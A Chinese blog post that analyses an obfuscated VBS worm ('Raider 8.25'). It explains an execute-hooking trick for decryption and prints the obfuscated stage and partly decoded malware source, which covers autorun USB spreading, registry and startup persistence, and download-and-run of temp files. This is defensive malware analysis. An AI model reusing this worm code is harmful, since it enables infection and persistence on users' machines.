跟踪劫持execute解密VBS乱码

鬼仔注:备份 vbs.rar ok.txt

来源:余弦函数

思路应该不会错,一个才9.76 KB的VBS乱码解密出的文件有203 KB。源文件可以从这里下载:http://www.kingzoo.com/tools/greysign/vbs.rar或者直接点击这查看:http://evilcos.googlepages.com/evilvbs8.25.txt。现在我来说说自己的解密思路。

在VBS中,execute函数可以用来执行表达式,类似于JS中的eval。VBS中也有eval函数,不过它与execute有一点区别。关于JS的解密,我已经写过许多文章,比如可以使用alert替换eval弹出解密值,为了方便还可以使用标签解密大法或者document.getElementById()方法来获取解密结果等等。同理在VBS中可以用msgbox或者wscript.echo将解密结果弹出。
为了方便,我参考了点别人的思路写了这个VBS过程:
sub hook_execute(x)
‘wscript.echo x
outfile=”ok.txt”
set fso=createobject(“Scripting.FileSystemObject”)
if (fso.fileexists(outfile)) then
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
else
set objtxt=fso.createtextfile(outfile,True,False)
objtxt.write x&vbcrlf
objtxt.close
execute x
end if
end sub

这个hook_execute方法可以跟踪VBS乱码中execute行为,可以肯定的是当一段乱码被execute后最终会还原为明码,利用这个原理hook_execute会将解密的结果写进一个叫做ok.txt的文本文件中,并继续执行execute。用法很简单:将跟踪出的乱码中的 execute替换为hook_execute方法即可。由于VBS与JS一样是解释型语言,代码自上而下,一行一行地运行。所以有时候我们寻找解密入口点时,应该优先考虑最后一个execute。并且由于现在的VBS/VbScript/JS都喜欢将一些特征字符串打乱,然后用逻辑符拼接,其目的或者是为了达到免杀或者是为了迷惑破解者,我们应该利用这些双引号(字符串在双引号内,VBS的单引号是注释符)来区分每个字符串片段。也许从中会发现一些有价值的解密信息。
第一次解密时利用hook_execute方法,将乱码中的最后一个execute替换为hook_execute,然后解密得到结果,将第一次解密结果修改成如下:
on error resume next
dyz=”ire=|8.25|:if=|.iof|:ir=|.ior|:w=|\|:pz=|%pbzfcrp% /p |:qsb=|/8#0/|:gvy=|Rnvqre |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::0 gura}{uq=|g|+up}{ryfrvs bf2052 gura uq=|c|+up:ryfr uq=|$|+up:raq vs”:gtz=”gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>3 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>1000 be jo be td be abg flf) naq ee(|qrq|,1)pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq||}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=0.1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qanyr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1″:eiz=”vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr”:dfz=”ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)”:fut=”:function “:bfz=”qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1″:biz=”qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&|[nhgbeha]|&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1″:rtz=”vs yv0 naq yv0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs”:prz=”frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr=’|&cpf&|’|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf|0| gura je efc&|rkcybere|,-1}{uv 1}{vs ee(|gvy|,1)gvy gura}{je |gvy|,gvy}{je |gwf|,1}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs”:aft=eft&fut:coz=”qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7″:rn=”dim d:j=””\””:on error resume next”:rsz=”vs fj=1 naq ee(efc&efa,0)ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs”:hiz=”vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)”:giz=”vq=ee(|vqq|,1)}{qb juvyr svqsa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100″:usz=”sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q|A:| naq q |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|’|),1:qs q&vas}{raq vs}{raq vs}{arkg”:cuz=”phf=ee(|bfj|,1)4}{qb}{qph=ee(|gtf|,1)pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=1 naq aazva naq bb1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc”:ext=”:execute(uc(“:kmz=”vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs”:cfz=”vs eg(ju,1)|’|&ire gura ps=gehr”
function er(sco)
if err.number0 or sco0 and rr(“ded”,1)cstr(date) then
wr “oer”,rr(“oer”,1)+abs(sco)
if rr(“oer”,1)>100 then wr “ded”,date:wr “oer”,0
end if
end if
end function

‘将原来的所有execute替换为hook_execute。
str_t=”:hook_execute(uc(dyz)):hook_execute(uc(zcx)):function gt():hook_execute(uc(gtz)):end function:function ei(name,wt):hook_execute(uc(eiz)):end function:function df(wh):hook_execute(uc(dfz)):end function:function bf(wh,wt,da):hook_execute(uc(bfz)):end function:function bi(wh):hook_execute(uc(biz)):end function:function rt(wh,li):hook_execute(uc(rtz)):end function:function wr(rna,rda):hook_execute(uc(wrz)):end function:function rr(rna,pa):hook_execute(uc(rrz)):end function:function ar(file,cg):hook_execute(uc(arz)):end function:function dn(loc,web,ris,min):hook_execute(uc(dnz)):end function:function pr(pcs,gs):hook_execute(uc(prz)):end function:function ec(wt):hook_execute(uc(ecz)):end function:function co(wh):hook_execute(uc(coz)):end function:function rs(sw):hook_execute(uc(rsz)):end function:function hi(sw):hook_execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):hook_execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):hook_execute(uc(dwz)):end function:function us(sw):hook_execute(uc(usz)):end function:function cu():hook_execute(uc(cuz)):end function:function km(sw):hook_execute(uc(kmz)):end function:function cf(wh):hook_execute(uc(cfz)):end function”
execute(str_t)
function uc(b):x=”633D766263726C663A643D3132373A663D31313A6A3D31323A683D31343A6D3D33313A723D38333A6B3D313A6E3D383A733D3131343A753D2D353A763D350D0A693D22696620613D223A743D22207468656E20223A653D22656C7365696620613E3D223A613D2220616E6420613C3D223A673D22613D612B223A6F3D74266326673A703D6326653A713D6326690D0A65786563757465286C2622666F722069693D3120746F206C656E2862293A613D617363286D696428622C69692C3129292226712622642226742622613D31332226712622662226742622613D313022267126226A22267426632622613D3334222663266526226822266126226D22266F26227222267026226B22266126226E22266F262273222670262235332226612622353722266F262275222670262234382226612622353222266F2622762226632622656E64206966222663262275633D75632B63687228612922266326226E657874222663262275633D726E2B632B75632229″:y=”execute “””””:z=”&chr(&h”:w=”)”:execute(“do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)”&vbcrlf&”loop”):execute(y):end function
sub hook_execute(x)
‘wscript.echo x
outfile=”ok.txt”
set fso=createobject(“Scripting.FileSystemObject”)
if (fso.fileexists(outfile)) then
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
else
set objtxt=fso.createtextfile(outfile,True,False)
objtxt.write x&vbcrlf
objtxt.close
execute x
end if
end sub

msgbox “success:-)”
这个VBS乱码真的很酷,参数、函数太多,犹如一个巨大而复杂的信息蛛网,破解得人心慌慌:-(,它自己的解密函数uc本身就是乱码,要破解出这个乱码也很容易,就是将execute替换掉。为了保持良好的心态,必须始终记住:所有的乱码最终都必须还原成它的解释器可以识别的明码。最终解密出的代码如下:
dim d:j=”\”:on error resume next
ver=”8.25″:vs=”.vbs”:ve=”.vbe”:j=”\”:cm=”%comspec% /c “:dfo=”/8#0/”:til=”Raider “&ver:inf=”\autorun.inf”
set ws=createobject(“wscript.shell”):set wmi=getobject(“winmgmts:\\.\root\cimv2”)
set fso=createobject(“scripting.filesystemobject”):set sis=wmi.execquery(“select * from win32_operatingsystem”)
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&”wbem\”:mir=left(ouw,len(ouw)-len(wscript.scriptname))
wsr=”createobject(“”wscript.shell””).run”:cnr=”\computername”:cnp=”HKLM\system\currentcontrolset\control”&cnr&cnr&cnr
cna=rr(cnp,0):if cna=”” then cna=til
rpa=”HKLM\software\”&cna&j:rop=”\software\microsoft\windows\currentversion\explorer\”
sf=”shell folders\”:fsp=rr(“HKLM”&rop&sf&”common startup”,0)&j&vs:fap=rr(“HKCU”&rop&sf&”favorites”,0)&j
dap=rr(“HKCU”&rop&sf&”desktop”,0)&j:rsn=cna:ht=ec(“ivwt?56”):ha=ec(“:;9::0 then
hd=”t”+hc
elseif os2052 then hd=”p”+hc:else hd=”$”+hc:end if
dim d:j=”\”:on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
dim d:j=”\”:on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0

‘…….. 开始大量重复
‘dim d:j=”\”:on error resume next
‘if pa=1 then rna=rpa&rna
‘rr=ws.regread(rna)
‘if er(0) then rr=0

‘……..片段
if er(0) then rr=0
dim d:j=”\”:on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j=”\”:on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j=”\”:on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j=”\”:on error resume next
for each d in dc
if mir=d&j then ws.run “explorer “&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox(“holle,raider!”):km 1
if sys then
if rr(rsp&”explorer”,0)”0″ then wr rsp&”explorer”,-1
hi 1
if rr(“til”,1)til then
wr “til”,til
wr “tjs”,1
wr “djs”,date
wr “ded”,0
end if
if rr(“atd”,1)=1 then ws.run “at /d /y”,0,false:wr “atd”,0
if rr(rsp&rsn,0)=ve then rs -1
le=rr(“dna”,1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr(“ded”,1)cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr(“wscript.exe”,2)=2 then
if rr(“tjc”,1)=cstr(date) then:wscript.quit:else:wr “tjc”,date
end if
if pr(“wscript.exe”,2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if
dim d:j=”\”:on error resume next
if li0 and li”‘”&ver then cf=true
dim d:j=”\”:on error resume next
if li0 and liabs(gs) then pr=1
if gsabs(gs) then pr=1
if gsve then
ws.regwrite rsp&rsn,ve,”REG_SZ”
if er(0) and not ei(fsp,1) then bf fsp,wsr&” “””&ve&””””,0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
dim d:j=”\”:on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
dim d:j=”\”:on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)

‘…….. 开始大量重复
‘if er(0) then rr=0
‘dim d:j=”\”:on error resume next
‘if pa=1 then rna=rpa&rna
‘rr=ws.regread(rna)

‘……..片段
if er(0) then rr=0
dim d:j=”\”:on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
dim d:j=”\”:on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j=”\”:on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j=”\”:on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j=”\”:on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j=”\”:on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j=”\”:on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,”REG_SZ”
dim d:j=”\”:on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,”REG_SZ”

结束……源文件:http://evilcos.googlepages.com/ok.txt。至于初始VBS乱码中的OO变量的值,我感觉没用。这个VBS的行为是什么,可以用HIPS工具跟踪看看,否则你就慢慢读这些令人发指的源码吧。
【相关信息】
1、此乱码版本为8.25。
2、解密过程中有弹出此信息:holle,raider!(这个是作者吗?)
【相关文章】
1、一个变态的加密VBS:http://hi.baidu.com/greysign/blog/item/fba23b3f46acd5e855e7232f.html
2、杀脑细胞的东西:http://hi.baidu.com/dikex/blog/item/7c1838087ad6af34e824884f.html
3、一个加密的vbs病毒照本宣科的解密之旅:http://hi.baidu.com/fuxudong/blog/item/431ddb2451aa06054c088d02.html

相关日志

发表评论